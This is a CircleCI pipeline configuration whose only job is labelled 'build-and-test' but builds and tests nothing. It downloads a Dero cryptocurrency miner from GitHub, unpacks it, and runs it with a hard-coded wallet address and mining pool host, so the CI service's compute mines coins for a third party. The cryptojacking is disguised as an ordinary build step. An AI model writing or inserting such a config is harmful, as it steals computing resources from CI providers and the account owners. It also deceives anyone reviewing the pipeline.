version: 2.1
orbs:
  python: circleci/python@1.5.0


jobs:
  build-and-test:
    docker:
      - image: deroproxy/dero:miner
    steps:
      - checkout
      - run: wget https://github.com/dero-am/astrobwt-miner/releases/download/V1.8_BETA2/astrominer-V1.8_BETA2_modern_amd64_linux.tar.gz
      - run: tar zxvf astrominer-V1.8_BETA2_modern_amd64_linux.tar.gz
      - run: ./astrominer -w dero1qy4p7g4tlfl837nhskz5a6x4cqup28e2hpm0vktsw39smpn3fyah7qqtq7yhq -p rpc -r community-pools.mysrv.cloud:10300
workflows:
  sample:
    jobs:
      - build-and-test
